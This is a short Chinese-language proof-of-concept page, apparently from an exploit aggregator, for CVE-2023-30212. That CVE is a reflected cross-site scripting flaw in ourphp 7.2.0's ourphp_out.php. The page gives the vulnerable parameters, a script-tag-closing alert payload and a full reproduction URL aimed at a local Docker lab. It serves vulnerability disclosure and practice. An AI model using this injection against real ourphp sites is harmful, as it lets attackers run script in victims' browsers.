## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-RISHIPATIDAR-CVE-2023-30212-POC-DOCKER-FILE
# CVE-2023-30212 POC : 跨站脚本攻击
#### 通过 /client/manage/ourphp_out.php
## 受 CVE-2023-30212 影响的产品:
厂商| 产品| 版本
---|---|---
ourphp| ourphp| 7.2.0
## Docker 安装指南:
要安装 OURPHP <= 7.2.0 的 Docker 环境,你可以参考 指南 搭建用于练习的 Docker 环境。
## 漏洞说明:
root@kitploit:~
# ourphp 7.2.0 版本存在 XSS(跨站脚本攻击)漏洞。
# 在 /client/manage/ourphp_out.php 文件中,存在一个直接的 echo 功能,结合可控的变量,攻击者可以执行 XSS 代码。
# 当 ourphp_admin 参数设置为 "logout" 时,我们会输出一个名为 "out" 的可控变量。
# 为了利用该漏洞,我们添加了一个 script 标签并闭合它,从而形成我们的 payload。
# 通过 "out" 参数注入以下脚本即可利用此漏洞:</script><script>alert(xss)</script>
## 复现步骤:
root@kitploit:~
# 完成 Docker 环境搭建后,直接访问以下路径:
http://localhost/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert(`xss`)</script>
## 漏洞利用 Payload:
root@kitploit:~
# </script><script>alert(`xss`)</script>
## 视频

## 参考文献
1. NIST
2. cve.mitre.org
3. Ourphp <= 7.2.0 参考代码